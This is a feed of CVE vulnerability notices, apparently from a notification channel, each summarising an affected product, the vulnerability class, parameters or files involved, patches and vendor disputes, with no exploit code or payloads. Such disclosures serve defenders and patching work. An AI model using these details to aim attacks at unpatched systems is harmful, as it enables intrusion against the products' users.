🚨 CVE-2022-4773** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in cloudsync. Affected by this vulnerability is the function getItem of the file src/main/java/cloudsync/connector/LocalFilesystemConnector.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is 3ad796833398af257c28e0ebeade68518e0e612a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216919. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-03 02:37:26 |
🚨 CVE-2022-4603A vulnerability classified as problematic has been found in ppp. Affected is the function dumpppp of the file pppdump/pppdump.c of the component pppdump. The manipulation of the argument spkt.buf/rpkt.buf leads to improper validation of array index. The real existence of this vulnerability is still doubted at the moment. The name of the patch is a75fb7b198eed50d769c80c36629f38346882cbf. It is recommended to apply a patch to fix this issue. VDB-216198 is the identifier assigned to this vulnerability. NOTE: pppdump is not used in normal process of setting up a PPP connection, is not installed setuid-root, and is not invoked automatically in any scenario.🎖@cveNotify |
|
| 2024-08-03 02:37:25 |
🚨 CVE-2022-3704A vulnerability classified as problematic has been found in Ruby on Rails. This affects an unknown part of the file actionpack/lib/action_dispatch/middleware/templates/routes/_table.html.erb. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The real existence of this vulnerability is still doubted at the moment. The name of the patch is be177e4566747b73ff63fd5f529fab564e475ed4. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212319. NOTE: Maintainer declares that there isn’t a valid attack vector. The issue was wrongly reported as a security vulnerability by a non-member of the Rails team.🎖@cveNotify |
|
| 2024-08-03 02:37:24 |
🚨 CVE-2022-3647** DISPUTED ** A vulnerability, which was classified as problematic, was found in Redis up to 6.2.7/7.0.5. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The complexity of an attack is rather high. The exploitability is told to be difficult. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 6.2.8 and 7.0.6 is able to address this issue. The patch is identified as 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. NOTE: The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.🎖@cveNotify |
|
| 2024-08-03 01:37:24 |
🚨 CVE-2022-3007The vulnerability exists in Syska SW100 Smartwatch due to an improper implementation and/or configuration of Nordic Device Firmware Update (DFU) which is used for performing Over-The-Air (OTA) firmware updates on the Bluetooth Low Energy (BLE) devices. An unauthenticated attacker could exploit this vulnerability by setting arbitrary values to handle on the vulnerable device over Bluetooth.Successful exploitation of this vulnerability could allow the attacker to perform firmware update, device reboot or data manipulation on the target device.🎖@cveNotify |
|
| 2024-08-02 23:37:32 |
🚨 CVE-2023-51749ScaleFusion 10.5.2 does not properly limit users to the Edge application because a search can be made from a tooltip. NOTE: the vendor's position is "Not vulnerable if the default Windows device profile configuration is used which utilizes modern management with website allow-listing rules."🎖@cveNotify |
|
| 2024-08-02 23:37:25 |
🚨 CVE-2023-51079A long execution time can occur in the ParseTools.subCompileExpression method in MVEL 2.5.0.Final because of many Java class lookups. NOTE: the vendor disputes this because "the only thing that you could expect is that the parser will take a crazy amount of time to complete its task."🎖@cveNotify |
|
| 2024-08-02 23:37:24 |
🚨 CVE-2023-50428In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023. NOTE: although this is a vulnerability from the perspective of the Bitcoin Knots project, some others consider it "not a bug."🎖@cveNotify |
|
| 2024-08-02 22:37:38 |
🚨 CVE-2023-49610MachineSense FeverWarn Raspberry Pi-based devices lack input sanitization, which could allow an attacker on an adjacent network to send a message running commands or could overflow the stack.🎖@cveNotify |
|
| 2024-08-02 22:37:31 |
🚨 CVE-2023-47867MachineSense FeverWarn devices are configured as Wi-Fi hosts in a way that attackers within range could connect to the device's web services and compromise the device.🎖@cveNotify |
|
| 2024-08-02 22:37:30 |
🚨 CVE-2023-48193Insecure Permissions vulnerability in JumpServer GPLv3 v.3.8.0 allows a remote attacker to execute arbitrary code via bypassing the command filtering function. NOTE: this is disputed because command filtering is not intended to restrict what code can be run by authorized users who are allowed to execute files.🎖@cveNotify |
|
| 2024-08-02 22:37:29 |
🚨 CVE-2023-48023Anyscale Ray 2.6.3 and 2.8.0 allows /log_proxy SSRF. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment🎖@cveNotify |
|
| 2024-08-02 22:37:26 |
🚨 CVE-2023-49210The openssl (aka node-openssl) NPM package through 2.0.0 was characterized as "a nonsense wrapper with no real purpose" by its author, and accepts an opts argument that contains a verb field (used for command execution). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 22:37:25 |
🚨 CVE-2023-47678An improper access control vulnerability exists in RT-AC87U all versions. An attacker may read or write files that are not intended to be accessed by connecting to a target device via tftp.🎖@cveNotify |
|
| 2024-08-02 22:37:24 |
🚨 CVE-2023-48094A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim's browser via sending a crafted payload to /container_files/public_html/doc/index.html. NOTE: the vendor’s position is that Apps/Sandcastle/standalone.html is part of the CesiumGS/cesium GitHub repository, but is demo code that is not part of the CesiumJS JavaScript library product.🎖@cveNotify |
|
| 2024-08-02 22:07:24 |
🚨 CVE-2024-37873SQL injection vulnerability in view_payslip.php in Itsourcecode Payroll Management System Project In PHP With Source Code 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.🎖@cveNotify |
|
| 2024-08-02 21:37:33 |
🚨 CVE-2024-28429DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php🎖@cveNotify |
|
| 2024-08-02 21:37:26 |
🚨 CVE-2023-45225Zavio CF7500, CF7300, CF7201, CF7501, CB3211, CB3212, CB5220, CB6231, B8520, B8220, and CD321 IP Cameras with firmware version M2.1.6.05 are vulnerable to multiple instances of stack-based overflows. While parsing certain XML elements from incoming network requests, the product does not sufficiently check or validate allocated buffer size. This may lead to remote code execution.🎖@cveNotify |
|
| 2024-08-02 21:37:25 |
🚨 CVE-2023-46033D-Link (Non-US) DSL-2750U N300 ADSL2+ and (Non-US) DSL-2730U N150 ADSL2+ are vulnerable to Incorrect Access Control. The UART/Serial interface on the PCB, provides log output and a root terminal without proper access control.🎖@cveNotify |
|
| 2024-08-02 21:37:24 |
🚨 CVE-2023-45322libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is "I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail."🎖@cveNotify |
|
| 2024-08-02 21:07:25 |
🚨 CVE-2024-37225Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Zoho Marketing Automation.This issue affects Zoho Marketing Automation: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-08-02 21:07:24 |
🚨 CVE-2024-37112Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Membership Software WishList Member X.This issue affects WishList Member X: from n/a before 3.26.7.🎖@cveNotify |
|
| 2024-08-02 20:37:24 |
🚨 CVE-2022-41479The DevExpress Resource Handler (ASPxHttpHandlerModule) in DevExpress ASP.NET Web Forms Build v19.2.3 does not verify the referenced objects in the /DXR.axd?r= HTTP GET parameter. This leads to an Insecure Direct Object References (IDOR) vulnerability which allows attackers to access the application source code. NOTE: the vendor disputes this because the retrieved source code is only the DevExpress client-side application code that is, of course, intentionally readable by web browsers (a site's custom code and data is never accessible via an IDOR approach).🎖@cveNotify |
|
| 2024-08-02 20:07:32 |
🚨 CVE-2024-40873There is a cross-site scripting vulnerability in the SecureAccess administrative console of Absolute Secure Access prior to version 13.07.Attackers with system administrator permissions can interfere with anothersystem administrator’s use of the publishing UI when the administrators areediting the same management object. The scope is unchanged, there is no loss ofconfidentiality. Impact to system availability is none, impact to systemintegrity is high.🎖@cveNotify |
|
| 2024-08-02 20:07:31 |
🚨 CVE-2022-32759IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 uses insufficient session expiration which could allow an unauthorized user to obtain sensitive information. IBM X-Force ID: 228565.🎖@cveNotify |
|
| 2024-08-02 20:07:30 |
🚨 CVE-2024-39126Roundup before 2.4.0 allows XSS via JavaScript in PDF, XML, and SVG documents.🎖@cveNotify |
|
| 2024-08-02 20:07:26 |
🚨 CVE-2024-39124In Roundup before 2.4.0, classhelpers (_generic.help.html) allow XSS.🎖@cveNotify |
|
| 2024-08-02 20:07:25 |
🚨 CVE-2024-6022The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-08-02 20:07:24 |
🚨 CVE-2024-29506Artifex Ghostscript before 10.03.0 has a stack-based buffer overflow in the pdfi_apply_filter() function via a long PDF filter name.🎖@cveNotify |
|
| 2024-08-02 19:37:43 |
🚨 CVE-2024-25344Cross Site Scripting vulnerability in ITFlow.org before commit v.432488eca3998c5be6b6b9e8f8ba01f54bc12378 allows a remtoe attacker to execute arbitrary code and obtain sensitive information via the settings.php, settings+company.php, settings_defaults.php,settings_integrations.php, settings_invoice.php, settings_localization.php, settings_mail.php components.🎖@cveNotify |
|
| 2024-08-02 19:37:42 |
🚨 CVE-2023-40453Docker Machine through 0.16.2 allows an attacker, who has control of a worker node, to provide crafted version data, which might potentially trick an administrator into performing an unsafe action (via escape sequence injection), or might have a data size that causes a denial of service to a bastion node. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 19:37:38 |
🚨 CVE-2023-41084Session management within the web application is incorrect and allows attackers to steal session cookies to perform a multitude of actions that the web app allows on the device.🎖@cveNotify |
|
| 2024-08-02 19:37:37 |
🚨 CVE-2023-40743** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE.As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.🎖@cveNotify |
|
| 2024-08-02 19:37:36 |
🚨 CVE-2023-39663Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern. NOTE: the vendor disputes this because the regular expressions are not applied to user input; thus, there is no risk.🎖@cveNotify |
|
| 2024-08-02 19:37:32 |
🚨 CVE-2023-39615Xmlsoft Libxml2 v2.11.0 was discovered to contain an out-of-bounds read via the xmlSAX2StartElement() function at /libxml2/SAX2.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted XML file. NOTE: the vendor's position is that the product does not support the legacy SAX1 interface with custom callbacks; there is a crash even without crafted input.🎖@cveNotify |
|
| 2024-08-02 18:37:24 |
🚨 CVE-2023-39017quartz-jobs 2.3.2 and below was discovered to contain a code injection vulnerability in the component org.quartz.jobs.ee.jms.SendQueueMessageJob.execute. This vulnerability is exploited via passing an unchecked argument. NOTE: this is disputed by multiple parties because it is not plausible that untrusted user input would reach the code location where injection must occur.🎖@cveNotify |
|
| 2024-08-02 18:07:24 |
🚨 CVE-2024-4751The WP Prayer II WordPress plugin through 2.4.7 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-08-02 17:37:43 |
🚨 CVE-2023-36307ZPLGFA 1.1.1 allows attackers to cause a panic (because of an integer index out of range during a ConvertToGraphicField call) via an image of zero width. NOTE: it is unclear whether there are common use cases in which this panic could have any security consequence🎖@cveNotify |
|
| 2024-08-02 17:37:42 |
🚨 CVE-2023-36092Authentication Bypass vulnerability in D-Link DIR-859 FW105b03 allows remote attackers to gain escalated privileges via via phpcgi_main. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 17:37:41 |
🚨 CVE-2023-36091Authentication Bypass vulnerability in D-Link DIR-895 FW102b07 allows remote attackers to gain escalated privileges via via function phpcgi_main in cgibin. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 17:37:38 |
🚨 CVE-2023-36090Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 17:37:37 |
🚨 CVE-2023-35833An issue was discovered in YSoft SAFEQ 6 Server before 6.0.82. When modifying the URL of the LDAP server configuration from LDAPS to LDAP, the system does not require the password to be (re)entered. This results in exposing cleartext credentials when connecting to a rogue LDAP server. NOTE: the vendor originally reported this as a security issue but then reconsidered because of the requirement for Admin access in order to change the configuration.🎖@cveNotify |
|
| 2024-08-02 17:37:36 |
🚨 CVE-2023-37152Projectworlds Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Note: This has been disputed as not a valid vulnerability.🎖@cveNotify |
|
| 2024-08-02 17:37:32 |
🚨 CVE-2023-36632The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument. This argument is plausibly an untrusted value from an application's input data that was supposed to contain a name and an e-mail address. NOTE: email.utils.parseaddr is categorized as a Legacy API in the documentation of the Python email package. Applications should instead use the email.parser.BytesParser or email.parser.Parser class. NOTE: the vendor's perspective is that this is neither a vulnerability nor a bug. The email package is intended to have size limits and to throw an exception when limits are exceeded; they were exceeded by the example demonstration code.🎖@cveNotify |
|
| 2024-08-02 17:37:31 |
🚨 CVE-2023-35866In KeePassXC through 2.7.5, a local attacker can make changes to the Database security settings, including master password and second-factor authentication, within an authenticated KeePassXC Database session, without the need to authenticate these changes by entering the password and/or second-factor authentication to confirm changes. NOTE: the vendor's position is "asking the user for their password prior to making any changes to the database settings adds no additional protection against a local attacker."🎖@cveNotify |
|
| 2024-08-02 17:37:30 |
🚨 CVE-2023-34845Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert arbitrary content (users cannot create their own accounts through self-registration).🎖@cveNotify |
|
| 2024-08-02 17:37:26 |
🚨 CVE-2023-34942Asus RT-N10LX Router v2.0.0.39 was discovered to contain a stack overflow via the mac parameter at /start-apply.html. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 17:37:25 |
🚨 CVE-2023-34940Asus RT-N10LX Router v2.0.0.39 was discovered to contain a stack overflow via the url parameter at /start-apply.html. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 17:07:25 |
🚨 CVE-2024-36773A cross-site scripting (XSS) vulnerability in Monstra CMS v3.0.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Themes parameter at index.php.🎖@cveNotify |
|
| 2024-08-02 17:07:24 |
🚨 CVE-2024-34832Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.🎖@cveNotify |
|
| 2024-08-02 16:37:42 |
🚨 CVE-2024-41265A TLS certificate verification issue discovered in cortex v0.42.1 allows attackers to obtain sensitive information via the makeOperatorRequest function.🎖@cveNotify |
|
| 2024-08-02 16:37:38 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-08-02 16:37:37 |
🚨 CVE-2024-2097Authenticated List control client can execute the LINQ query in SCM Server to present event as list for operator. An authenticated malicious client can send special LINQ query to execute arbitrary code remotely (RCE) on the SCM Server that an attacker otherwise does not have authorization to do.🎖@cveNotify |
|
| 2024-08-02 16:37:36 |
🚨 CVE-2024-28389SQL injection vulnerability in KnowBand spinwheel v.3.0.3 and before allows a remote attacker to gain escalated privileges and obtain sensitive information via the SpinWheelFrameSpinWheelModuleFrontController::sendEmail() method.🎖@cveNotify |
|
| 2024-08-02 16:37:32 |
🚨 CVE-2024-25656Improper input validation in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS can result in unauthenticated CPE (Customer Premises Equipment) devices storing arbitrarily large amounts of data during registration. This can potentially lead to DDoS attacks on the application database and, ultimately, affect the entire product.🎖@cveNotify |
|
| 2024-08-02 16:37:31 |
🚨 CVE-2023-32637GBrowse accepts files with any formats uploaded and places them in the area accessible through unauthenticated web requests. Therefore, anyone who can upload files through the product may execute arbitrary code on the server.🎖@cveNotify |
|
| 2024-08-02 16:37:30 |
🚨 CVE-2023-34150** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.🎖@cveNotify |
|
| 2024-08-02 16:37:26 |
🚨 CVE-2023-34257An issue was discovered in BMC Patrol through 23.1.00. The agent's configuration can be remotely modified (and, by default, authentication is not required). Some configuration fields related to SNMP (e.g., masterAgentName or masterAgentStartLine) result in code execution when the agent is restarted. NOTE: the vendor's perspective is "These are not vulnerabilities for us as we have provided the option to implement the authentication."🎖@cveNotify |
|
| 2024-08-02 16:37:25 |
🚨 CVE-2023-33796A vulnerability in Netbox v3.5.1 allows unauthenticated attackers to execute queries against the GraphQL database, granting them access to sensitive data stored in the database. NOTE: the vendor disputes this because the reporter's only query was for the schema of the API, which is public; queries for database objects would have been denied.🎖@cveNotify |
|
| 2024-08-02 16:37:24 |
🚨 CVE-2023-33281The remote keyfob system on Nissan Sylphy Classic 2021 sends the same RF signal for each door-open request, which allows for a replay attack. NOTE: the vendor's position is that this cannot be reproduced with genuine Nissan parts: for example, the combination of keyfob and door handle shown in the exploit demonstration does not match any technology that Nissan provides to customers.🎖@cveNotify |
|
| 2024-08-02 15:07:32 |
🚨 CVE-2024-36996In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.109, an attacker could determine whether or not another user exists on the instance by deciphering the error response that they would likely receive from the instance when they attempt to log in. This disclosure could then lead to additional brute-force password-guessing attacks. This vulnerability would require that the Splunk platform instance uses the Security Assertion Markup Language (SAML) authentication scheme.🎖@cveNotify |
|
| 2024-08-02 15:07:31 |
🚨 CVE-2024-36995In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could create experimental items.🎖@cveNotify |
|
| 2024-08-02 15:07:30 |
🚨 CVE-2024-36994In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could craft a malicious payload through a View and Splunk Web Bulletin Messages that could result in execution of unauthorized JavaScript code in the browser of a user.🎖@cveNotify |
|
| 2024-08-02 15:07:26 |
🚨 CVE-2023-30430IBM Security Verify Access 10.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from trace logs. IBM X-Force ID: 252183.🎖@cveNotify |
|
| 2024-08-02 15:07:25 |
🚨 CVE-2024-5199The Spotify Play Button WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-08-02 15:07:24 |
🚨 CVE-2024-5169The Video Widget WordPress plugin through 1.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-08-02 14:37:32 |
🚨 CVE-2024-42224In the Linux kernel, the following vulnerability has been resolved:net: dsa: mv88e6xxx: Correct check for empty listSince commit a3c53be55c95 ("net: dsa: mv88e6xxx: Support multiple MDIObusses") mv88e6xxx_default_mdio_bus() has checked that thereturn value of list_first_entry() is non-NULL.This appears to be intended to guard against the list chip->mdios beingempty. However, it is not the correct check as the implementation oflist_first_entry is not designed to return NULL for empty lists.Instead, use list_first_entry_or_null() which does return NULL if thelist is empty.Flagged by Smatch.Compile tested only.🎖@cveNotify |
|
| 2024-08-02 14:37:31 |
🚨 CVE-2024-42159In the Linux kernel, the following vulnerability has been resolved:scsi: mpi3mr: Sanitise num_physInformation is stored in mr_sas_port->phy_mask, values larger then size ofthis field shouldn't be allowed.🎖@cveNotify |
|
| 2024-08-02 14:37:30 |
🚨 CVE-2024-42158In the Linux kernel, the following vulnerability has been resolved:s390/pkey: Use kfree_sensitive() to fix Coccinelle warningsReplace memzero_explicit() and kfree() with kfree_sensitive() to fixwarnings reported by Coccinelle:WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1506)WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1643)WARNING opportunity for kfree_sensitive/kvfree_sensitive (line 1770)🎖@cveNotify |
|
| 2024-08-02 14:37:26 |
🚨 CVE-2024-42156In the Linux kernel, the following vulnerability has been resolved:s390/pkey: Wipe copies of clear-key structures on failureWipe all sensitive data from stack for all IOCTLs, which convert aclear-key into a protected- or secure-key.🎖@cveNotify |
|
| 2024-08-02 14:37:25 |
🚨 CVE-2023-29417An issue was discovered in libbzip3.a in bzip3 1.2.2. There is a bz3_decompress out-of-bounds read in certain situations where buffers passed to bzip3 do not contain enough space to be filled with decompressed data. NOTE: the vendor's perspective is that the observed behavior can only occur for a contract violation, and thus the report is invalid.🎖@cveNotify |
|
| 2024-08-02 14:37:24 |
🚨 CVE-2023-29218The Twitter Recommendation Algorithm through ec83d01 allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking, and reporting, as exploited in the wild in March and April 2023. NOTE: Vendor states that allowing users to unfollow, mute, block, and report tweets and accounts and the impact of these negative engagements on Twitter’s ranking algorithm is a conscious design decision, rather than a security vulnerability.🎖@cveNotify |
|
| 2024-08-02 14:07:26 |
🚨 CVE-2024-38489Dell iDRAC Service Module version 5.3.0.0 and prior contains Out of bound write Vulnerability. A privileged local attacker could execute arbitrary code potentially resulting in a denial of service (partial) event.🎖@cveNotify |
|
| 2024-08-02 14:07:25 |
🚨 CVE-2024-25948Dell iDRAC Service Module version 5.3.0.0 and prior, contain a Out of bound Write Vulnerability. A privileged local attacker could execute arbitrary code potentially resulting in a denial of service event.🎖@cveNotify |
|
| 2024-08-02 14:07:24 |
🚨 CVE-2024-25947Dell iDRAC Service Module version 5.3.0.0 and prior, contain an Out of bound Read Vulnerability. A privileged local attacker could execute arbitrary code potentially resulting in a denial of service event.🎖@cveNotify |
|
| 2024-08-02 13:37:31 |
🚨 CVE-2024-0874A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.🎖@cveNotify |
|
| 2024-08-02 13:37:30 |
🚨 CVE-2023-6394A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions.🎖@cveNotify |
|
| 2024-08-02 13:37:26 |
🚨 CVE-2023-27890The Export User plugin through 2.0 for MyBB allows XSS during the process of an admin generating DSGVO data for a user, via the Custom User Title, Location, or Bio field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 13:37:25 |
🚨 CVE-2023-28155The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 13:37:24 |
🚨 CVE-2023-27974Bitwarden through 2023.2.1 offers password auto-fill when the second-level domain matches, e.g., a password stored for an example.com hosting provider when customer-website.example.com is visited. NOTE: the vendor's position is that "Auto-fill on page load" is not enabled by default.🎖@cveNotify |
|
| 2024-08-02 13:07:43 |
🚨 CVE-2024-38770Improper Privilege Management vulnerability in Revmakx Backup and Staging by WP Time Capsule allows Privilege Escalation, Authentication Bypass.This issue affects Backup and Staging by WP Time Capsule: from n/a through 1.22.20.🎖@cveNotify |
|
| 2024-08-02 13:07:42 |
🚨 CVE-2024-32864Under certain circumstances exacqVision Web Services will not enforce secure web communications (HTTPS)🎖@cveNotify |
|
| 2024-08-02 13:07:41 |
🚨 CVE-2024-32863Under certain circumstances the exacqVision Web Services may be susceptible to Cross-Site Request Forgery (CSRF)🎖@cveNotify |
|
| 2024-08-02 13:07:37 |
🚨 CVE-2024-7365A vulnerability was found in SourceCodester Tracking Monitoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_establishment.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273344.🎖@cveNotify |
|
| 2024-08-02 13:07:36 |
🚨 CVE-2024-7363A vulnerability, which was classified as critical, was found in SourceCodester Tracking Monitoring Management System 1.0. Affected is an unknown function of the file /manage_person.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273342 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-02 13:07:35 |
🚨 CVE-2024-7362A vulnerability, which was classified as critical, has been found in SourceCodester Tracking Monitoring Management System 1.0. This issue affects some unknown processing of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273341 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-02 13:07:32 |
🚨 CVE-2024-4353Concrete CMS versions 9.0.0 through 9.3.2 are affected by a stored XSS vulnerability in the generate dashboard boardinstance functionality. The Name input field does not check the input sufficiently letting a rogue administrator hav the capability to inject maliciousJavaScript code. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator and a CVSS v4 score of 1.8 with a vector of CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N Thanks fhAnso for reporting.🎖@cveNotify |
|
| 2024-08-02 13:07:31 |
🚨 CVE-2024-7360A vulnerability classified as problematic has been found in SourceCodester Tracking Monitoring Management System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273339.🎖@cveNotify |
|
| 2024-08-02 13:07:30 |
🚨 CVE-2024-7255Out of bounds read in WebTransport in Google Chrome prior to 127.0.6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-02 13:07:26 |
🚨 CVE-2024-7211The 1E Platform’s Identity Server was impacted by an open redirect vulnerability, allowing an attacker to dictate the redirection path of an end user.Note: The Identity Server on 1E Platform has been updated with the patch that includes the fix.🎖@cveNotify |
|
| 2024-08-02 13:07:25 |
🚨 CVE-2024-23600Improper Input Validation of query search results for private field data in PingIDM OPENIDM (Query Filter module) allows for a potentially efficient brute forcing approach leading to information disclosure.🎖@cveNotify |
|
| 2024-08-02 11:37:43 |
🚨 CVE-2023-24229DrayTek Vigor2960 v1.5.1.4 allows an authenticated attacker with network access to the web management interface to inject operating system commands via the mainfunction.cgi 'parameter' parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 11:37:42 |
🚨 CVE-2023-22934In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the ‘pivot’ search processing language (SPL) command lets a search bypass SPL safeguards for risky commands using a saved search job. The vulnerability requires an authenticated user to craft the saved job and a higher privileged user to initiate a request within their browser.🎖@cveNotify |
|
| 2024-08-02 11:37:41 |
🚨 CVE-2023-23130Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled. OTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting.🎖@cveNotify |
|
| 2024-08-02 11:37:37 |
🚨 CVE-2023-23127In Connectwise Control 22.8.10013.8329, the login page does not implement HSTS headers therefore not enforcing HTTPS. NOTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting.🎖@cveNotify |
|
| 2024-08-02 11:37:36 |
🚨 CVE-2023-24098TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the submit-url parameter at /formSysLog. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-02 11:37:32 |
